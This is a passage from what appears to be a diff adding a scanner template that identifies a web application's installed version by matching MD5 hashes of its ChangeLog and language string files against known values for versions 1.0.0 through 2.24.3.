"(\"685e8f0c147cde37c27561635060c806\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"1a9b7e0a07644b6f0e392b5fcbe1ab7c\" == md5(body))" + - type: dsl + name: 1.1.2 - 1.1.4 + dsl: + - "(\"aa45bcb16e37de632aa5ef0001095444\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.1 + dsl: + - "(\"4aa70be614589f343a7317f86ab9c9a8\" == md5(body))" + - type: dsl + name: 1.0.8 + dsl: + - "(\"d65ad27e1add5f2e0a2de7d7e8fa4bcf\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.7 + dsl: + - "(\"56ff2e60d6c8fd851391bc25e87b9f21\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"61396369977b32f6a042fecf16c16fea\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"cba75446b63410e229b6034d58d7ac49\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"b030cfbd173a9f928b5e07c856e10bf2\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.9.1 + dsl: + - "(\"7ce4c4c26ed63d00d08ade010a0b287c\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"9329f284947a2e0ac8da9a162f33a37f\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"b4007d1ee599e0890a5dcbaf55329e66\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"90343c47b58e2914216d33358712eace\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"de86660ae9259b889051518cba6a3da5\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"52e00821692754da40ba753ae460cb04\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"5316759c7ac551805ad34719ae0cebc1\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"4984a630e40bc4ac2de87d994df00d88\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"5c57a3101ce9596452ba94f11e4d9058\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"30287666d452aeaa329a70d1267cdcb4\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"ccaf6c1621f2482ebc422e3d082b3963\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"fc821018dd18f3c68c4b48a63bccedf0\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"7d8c9b2cb53a44811c6111de1ab59d6f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/doc/ChangeLog" + + matchers: + - type: dsl + name: 1.1.8 - 1.1.9 + dsl: + - "(\"b35e373276e2d62b81bf80b35864e38f\" == md5(body))" + - type: dsl + name: 1.1.7 + dsl: + - "(\"f25632103e07cee3ce25e9a81770352c\" == md5(body))" + - type: dsl + name: 1.1.6 + dsl: + - "(\"859fcefddb85b2a26d6d6cdd6ceef799\" == md5(body))" + - type: dsl + name: 1.1.5 + dsl: + - "(\"599af64e2f7fe953f15a23cacfa70275\" == md5(body))" + - type: dsl + name: 1.1.4 + dsl: + - "(\"d5df7f5d608aa8f3789c657aec2c0591\" == md5(body))" + - type: dsl + name: 1.1.3 + dsl: + - "(\"d9c1f5fd63b5f7b04a5df28186516c04\" == md5(body))" + - type: dsl + name: 1.1.2 + dsl: + - "(\"2be68e8831f211183e235cfbe3bf4c4d\" == md5(body))" + - type: dsl + name: 1.1.1 + dsl: + - "(\"e3593a02c496e993cd50b4ba6043583d\" == md5(body))" + - type: dsl + name: 1.1.0 + dsl: + - "(\"d4ad9b059a3a6b1f6ddc1af2a93edad0\" == md5(body))" + - type: dsl + name: 1.0.8 + dsl: + - "(\"83cc2fdb4c73527496a1073b0c6a5fd3\" == md5(body))" + - type: dsl + name: 1.0.7 + dsl: + - "(\"ec3add622fada697e21630cb461c1a79\" == md5(body))" + - type: dsl + name: 1.0.6 + dsl: + - "(\"58093eb98935a3e6398fb9f7f8ede940\" == md5(body))" + - type: dsl + name: 1.0.5 + dsl: + - "(\"31538703e6d8b6cb84004c9cd201a7c9\" == md5(body))" + - type: dsl + name: 1.0.4 + dsl: + - "(\"48922ce66670f9f59ad5fd38ffd91261\" == md5(body))" + - type: dsl + name: 1.0.3 + dsl: + - "(\"83b17189b6436a0bcbb1d68486ff6543\" == md5(body))" + - type: dsl + name: 1.0.2 + dsl: + - "(\"a97e34406468478541323d98938e478c\" == md5(body))" + - type: dsl + name: 1.0.1 + dsl: + - "(\"b71ca2af1b280a1d24bf223b6ff3b34d\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"e128aec3bb6fb230b1d34171660ea521\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_german.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"b86ab01a01345c0e9ea392f637d8fc6f\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"427773021df4d88176cf150da7571217\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"3f0a82b6483d662b7f66c10cbc0f47a3\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"651bbbff1899fd8c5e43cbe5910b76fb\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"e94298cbebfc933f964074f6319ffd5f\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"5c5d7a2c65f85bc86ed497844f03fb46\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"4beb115356505cd687d4b3a97f8879c6\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"ff568c3c2c516c5fa9bebee3e2b88693\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"c759dde726977723c20b00e8a0602212\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"fa48b9526fec9efc77207efe8772967e\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"5f98ee09ca673f5d17db0618dc270213\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"04cbb7b88d84e5654a23bb90089e9189\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"b82e9f0187ac30ad51f76955a8ccf449\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"3a178d7c5372d8ffff8aa81e94a4fbd2\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"74b4f2f62f2f56a45002bc552be41432\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"32b6aeb6d8cc7ec05d022b1c80625835\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"cd56cafe33a0ca1bc7cc799b9ab0ef06\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"13aea94e836c5b164e7858f87d5309f7\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"3557b0f2c2da1616ef1fcc5824d6c469\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"1815ce3f23cc1f7138d6b397dcf9dba3\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"d08742de9f6da840cbfbe18217e17916\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"12fc4af656a8a09cc166f184b8fcdf4f\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"0fce131fa69513638f7ba99b8193a847\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"0184a8e0f815a68ec3c14ffe021758fa\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"d2d41ac1b60f340c2aceb67498efc18d\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"8ef29f8e748b6f442673678f5f1b1be3\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"c4150b7e7512436f86166ca5d04d63ab\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"26c7db61e1257676eac819e9093e1a6e\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"0b0a05a36f2e88a96696c3e1b852672c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"52d4939331bb9a36cefd91e448d138c9\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"2ea4b8ae7487e5fda7834302068be60c\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"932461f5255c2872f2584fa7b9fbffb6\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"d15f8370507ba389d12826831c1a5ca6\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"9171ced4c182c7f8bb6a017fd9c85ede\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"d7a713b0ef6c74b033609acce8733d8c\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"850eea207c653b9591a13816fd3a1523\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"caf1fd6d53b64ba79707b576b2749078\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"3c1bc62d07077c19f1e598eb232355f1\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"77636f1bd8473d9fcd757c9cf3265b70\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"3afc14c8814702b657f97c40e43fea11\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"c7a577ef5f16e12c7a50cac4a2cee149\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"27ec0037fe6491c469a0ea23634a6f97\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"740a50153fecb01757bbffe63ddc8b2e\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"05fcd21241f64181dd704b05daa213fe\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"e3a4cd492840038edd2e552889d2d765\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"d828cf629aba9f7d44103f82df23a37c\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_traditional.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"e91495b5efad1f2c3dfdc753bc7acc2d\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"6ad73bc4d16807122f8177c75dd5ae15\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"f3b114a8948128c2ea99ab73fded5c1b\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"8d894629b366c3746ff92e6100c98dcc\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"985bf62bd4ffbf31b0390c88f0059ab8\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"3d960948172b7c2843bfbe0ff89e1fe4\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"32517881ee85aae3444df15a6134605a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"3dfb4e5d840f326101d340f16a3fc731\" == md5(body))" + - type: dsl + name: 1.2.9 + dsl: + - "(\"666a3d98579e2577b94f18b43ad99bbf\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"79cafbdf26d28e24914146b46944e3ff\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"3b9a51234c3cd6e96d3b7bb90d57e684\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"12213a1611ad8247134c074d1888fd41\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"ad13e676cd1b7942073883404a8f0fe3\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"b98e752d5cf1b203c8518cbfaf5b262b\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"14218025abeb016a300fbc132707312c\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"d33e327123c838ee393093c605ae6500\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"d24792d922216a224aa58bd9489e5f2d\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"79a8a68cdfe7d1325535f029b672865d\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"a00708b5c583267737a3d1d4741601c6\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.14 + dsl: + - "(\"50e97403a590b94cffc8621c18746425\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"aa15b82b14db7b7205d902394be0aeb2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"2d14fbab394730aac3cd27714deae99a\" == md5(body))" + - type: dsl + name: 1.2.10 + dsl: + - "(\"9e3d50b39eb7d80b5cd939a18865e3bc\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"0735dc23ae80b420c6439671c47ac889\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"4481c30d17a87e924f10c4340dff7a70\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"ceaba65a18ac31a84c2ce0bc6458ab09\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"ddc81b9d53795066accea13ec59e1d7c\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"b72104d15855157e935bf578bd22a439\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"a9b4230af8dde3bc6a478cf7e288e567\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f424255530ea71eed33942e11adb8f3c\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"0a1f51bc374ebc390eb6abedde8e362b\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.8.1 + dsl: + - "(\"172fcb87e508ca616671562a8b60c43b\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.10.1 + dsl: + - "(\"85fc7d6c86e74f2661a79238d0dc9e31\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"b3e0f4a208d3bde86928629050609b33\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"a30296398822cbb78269b3e5420a50c8\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"0a4a891e2ffc0479fe93ead7e17b9409\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"c541e1b601052401da5b5ae27fb9a00d\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"ceaf3a0fdf749375d41f945cfebbfb73\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.19.1 + dsl: + - "(\"fa181bd28184f55d1be96c054c7e850c\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.20.1 + dsl: + - "(\"4ee7137d971a0643a5e794736af2f42d\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.21.3 + dsl: + - "(\"a4c92ab569b582eaac96924a13e7f7b6\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"06f0508962e8c3c1a0fafc590ecb428b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"09f6bada3004509bf6a3c2da9a180e5b\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ffd7a22238f44ba9d058923700b23bd0\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_dutch.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.11.1 + dsl: + - "(\"b0a7eed497a5049acbdecbe2ec9419cb\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.4.2 + dsl: + - "(\"5fc875095aa819bdd3f3b4ea642cf07c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"f11ae092530feb3b446fd2085e1e432e\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"098699a884b17043d83800e88642c56a\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"6229d7148dc06623168afc5eead06a40\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"eb423a034935ba360c2fff586308d972\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"a41dc8af0335d2cd86426635b9ef16d5\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"13c3aeac8b3bf8ab89839aa3ff24ff39\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"4505e9c3be3e48217e7f8412fb51339c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"9828cc510aa8003be212c064344853fc\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"bb6c972d14a5ef2e27c2fe125e6d3da3\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"b356b7bdc7f9bcd7db308814afcee200\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"4bd7b61b3b5f9997358d0d0a2da49a4d\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"8b787c2df95ba5c6596a97314fc15abc\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"b262826a56849c0a4ba14be25ff1a943\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"af2cb47ba0fa465174d4a4f981699201\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"88c726b47e0e8eb264e8d360bc982e7c\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"7616569b719259b8f5c7ffc3c4390e5f\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"caf8bc47ae0495ad6155a1139161bb8d\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"310f116eb72b4b70bb7a94bced9a242c\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"974a35201a8bd103bc10a6f1e6e0d676\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"305123df0add03573c1c202cf4b2f09c\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"240047f035d6094ecb303a1a9adb5775\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"339e2f3ea9f7be0bfa4e881daf8dbfd3\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"3add38496863e38e50eee35ac1aee8d6\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"d048c83599902d1fd8312feba07a97fc\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"d4dda266ca80679bd87b2be51361a8a8\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"337b98037b2eb3ac7a2f790120d7f413\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"c5755a4bdb954e1bb004c74406379909\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"f28b84071120e9f5c911d8079ee5970a\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"205a8bb1bf06939a6cba53182bd94cb4\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"8d269d78db89f3e98baecf91a6d42f26\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.14.0 + dsl: + - "(\"9c31d7d8b0a1f8e00fbb6e9fb39a61c9\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.15.1 + dsl: + - "(\"6621584bfdf3b81586467908c9107119\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.17.2 + dsl: + - "(\"b099681941a1df7c2ed2cd059e40f1b5\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"098cc9240f3c727ef071add65cf10267\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"d6edf38820d1b015eb60279374fbe07d\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"e9a3ef2ce58ecc62aced84b1da755811\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"56630cb91afc8425e570db96cb1fa3cf\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"f72b9f7f5eb1fd521e6a650ed87d7616\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_chinese_simplified.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"678d7b6112714c2eb83c5bedf22f4271\" == md5(body))" + - type: dsl + name: 2.5.0 - 2.5.2 + dsl: + - "(\"a2d918a8933a1df0da12cd38ae7d29d6\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.4.2 + dsl: + - "(\"b313f0552025a15bd886e8c07ca9143e\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"1dd19ff80552104a70dfe0ac61c5c38c\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"5a8a527e5e6e1fbb5732c7fde3c7e3bf\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"856389c932ba96fc954b70fd75647dea\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"c22f19229a0c5919dc3eceaae430747b\" == md5(body))" + - type: dsl + name: 1.3.5 - 1.3.20 + dsl: + - "(\"607ba2df6785e7b9b9c0bc3691597232\" == md5(body))" + - type: dsl + name: 1.3.4 + dsl: + - "(\"b49f88913cf7130e6fa0cdf91568d79f\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"3315a9a167d2f75d36d79fe72372b39a\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"315e23705e58dbdd3262c2dd711014fc\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"52bceceea51d63debb632eeb3c1f3a7d\" == md5(body))" + - type: dsl + name: 1.2.6 - 1.2.8 + dsl: + - "(\"b6ec6d960a939eb86ab8bb24d9300d6c\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"92f3bbfe4144bd488da15e6c1ca03e1d\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"b32f0a7b647771c566d0987e5f3afa96\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.3 + dsl: + - "(\"f25b1db32bb1bbc857ff2b6bbce62947\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"4c2170e18bd111b06c1865c1ddb61b40\" == md5(body))" + - type: dsl + name: 1.2.17 + dsl: + - "(\"b69d4bb392ec0ccf6ee07f240751fca1\" == md5(body))" + - type: dsl + name: 1.2.16 + dsl: + - "(\"991bf2b397c2ddeeb6e7985921fb9452\" == md5(body))" + - type: dsl + name: 1.2.15 + dsl: + - "(\"077718ed13c175b0934c75356a9ee00f\" == md5(body))" + - type: dsl + name: 1.2.14 + dsl: + - "(\"c4329e41220b74aab41b8fca0d878e09\" == md5(body))" + - type: dsl + name: 1.2.13 + dsl: + - "(\"72a76411edd6c24d20ce0d0f31c4d879\" == md5(body))" + - type: dsl + name: 1.2.12 + dsl: + - "(\"81a8b66f05711251178636630705d4a2\" == md5(body))" + - type: dsl + name: 1.2.11 + dsl: + - "(\"ce2f0053deba5132ee46592610fcebaf\" == md5(body))" + - type: dsl + name: 1.2.1 + dsl: + - "(\"41f8eb85ed76caa52ed6a10ec333bce7\" == md5(body))" + - type: dsl + name: 1.2.0 + dsl: + - "(\"5fb3cc8647b6754bd05ded587be90f1e\" == md5(body))" + - type: dsl + name: 1.1.7 - 1.1.9 + dsl: + - "(\"9c52fd3c98493baac4a12e73c7361374\" == md5(body))" + - type: dsl + name: 1.1.5 - 1.1.6 + dsl: + - "(\"56184f66928579e6afdc4c434af9e59a\" == md5(body))" + - type: dsl + name: 1.1.0 - 1.1.4 + dsl: + - "(\"676f89d3a5cca7c289990e501500e6df\" == md5(body))" + - type: dsl + name: 1.0.6 - 1.0.8 + dsl: + - "(\"4be7efeb39a3a1f314547985157fe587\" == md5(body))" + - type: dsl + name: 1.0.1 - 1.0.5 + dsl: + - "(\"51b9c665cae634b44cfe6a198fabbfc2\" == md5(body))" + - type: dsl + name: 1.0.0 + dsl: + - "(\"7883591fafb2b53347ee41bb336ccd1e\" == md5(body))" + - type: dsl + name: 2.7.0 - 2.7.1 + dsl: + - "(\"82e3ebe701ff7d552f5250e25ede6747\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.8.1 + dsl: + - "(\"de344f5b9fca99d6c3e9687e925f65a1\" == md5(body))" + - type: dsl + name: 2.9.0 - 2.9.1 + dsl: + - "(\"82554ad2258397a4ebc19ddb1fb985c7\" == md5(body))" + - type: dsl + name: 2.10.0 - 2.10.1 + dsl: + - "(\"e8894d4fa44f0f8f137e3eabe2a81035\" == md5(body))" + - type: dsl + name: 2.11.0 - 2.11.1 + dsl: + - "(\"372a3cd15fd6788c05de92c370c5ef7a\" == md5(body))" + - type: dsl + name: 2.12.0 - 2.12.2 + dsl: + - "(\"7a65ba0ce8260b1ede624f030129896e\" == md5(body))" + - type: dsl + name: 2.13.0 - 2.13.2 + dsl: + - "(\"63ffcfa83e62601e327329888db24d08\" == md5(body))" + - type: dsl + name: 2.14.0 - 2.15.1 + dsl: + - "(\"44f0abf6fb65186b88b506abb75c0a8b\" == md5(body))" + - type: dsl + name: 2.16.0 - 2.16.1 + dsl: + - "(\"7f7e8823007ef299115b9a63bb5a8836\" == md5(body))" + - type: dsl + name: 2.17.0 - 2.17.2 + dsl: + - "(\"9e8e545ae3e568d37757f9f804c55066\" == md5(body))" + - type: dsl + name: 2.18.0 - 2.19.1 + dsl: + - "(\"c3c885178ff8c973b656d959a2f3317a\" == md5(body))" + - type: dsl + name: 2.20.0 - 2.21.3 + dsl: + - "(\"5c7b3d33f4290f1b25dc181d877ab4d4\" == md5(body))" + - type: dsl + name: 2.22.0 - 2.22.2 + dsl: + - "(\"b24257a3312b277df1737b3eb344e3e1\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.23.1 + dsl: + - "(\"ca319689c19c4877afeeb7fd5ae0ba85\" == md5(body))" + - type: dsl + name: 2.24.0 - 2.24.3 + dsl: + - "(\"ebda0d41dcae87fb4ba77cd5ab675353\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/lang/strings_macedonian.txt" + + matchers: + - type: dsl + name: 2.6.0 + dsl: + - "(\"5be5d1a105b786ce318c405bef3e8995\" == md5(body))" + - type: dsl + name: 2.4.0 - 2.5.2 + dsl: + - "(\"290e60af751d83f0e2c1dd9b5501fe03\" == md5(body))" + - type: dsl + name: 2.3.0 - 2.3.3 + dsl: + - "(\"9ee5023b061f0890665cb5df9ec9b8da\" == md5(body))" + - type: dsl + name: 2.2.0 - 2.2.4 + dsl: + - "(\"6382215cf60174d890ec46cac6541d82\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.1.3 + dsl: + - "(\"882b3b8647045bc23cb083c3ac123bcc\" == md5(body))" + - type: dsl + name: 2.0.0 - 2.0.1 + dsl: + - "(\"55ba7cf7c0f5e21185de0fdf02f26b9e\" == md5(body))" + - type: dsl + name: 1.3.4 - 1.3.20 + dsl: + - "(\"015b7dbf5df6c6d6ea00d8d17b61ba61\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"e330d37cd3bacfeb09f623c8ba054afd\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"aa296076e429c81dd23285860935133c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"705c7e3445310c9c7da0be55f8d13a0d\" == md5(body))" + - type: dsl + name: 1.2.7 - 1.2.8 + dsl: + - "(\"25e2a12720a1aa859cb53c540c8e66f9\" == md5(body))" + - type: dsl + name: 1.2.6 + dsl: + - "(\"b9c5680a973f12879c293a530011b0ba\" == md5(body))" + - type: dsl + name: 1.2.5 + dsl: + - "(\"61620afb4ac3f1c67f3f43bcf57b72e2\" == md5(body))" + - type: dsl + name: 1.2.4 + dsl: + - "(\"5f830df0a268b43bc5794b0393ee1567\" == md5(body))" + - type: dsl + name: 1.2.3 + dsl: + - "(\"c425b56808a315813e68ba7b1cb39676\" == md5(body))" + - type: dsl + name: 1.2.18 - 1.2.20 + dsl: + - "(\"fba6140c4929c4bf0faed9b026ce5ed5\" == md5(body))" + - type: dsl + name: 1.2.2 + dsl: + - "(\"7dc5492f2201a9ae37a7bad6d4e2ba19\" == md5(body))" + - type: 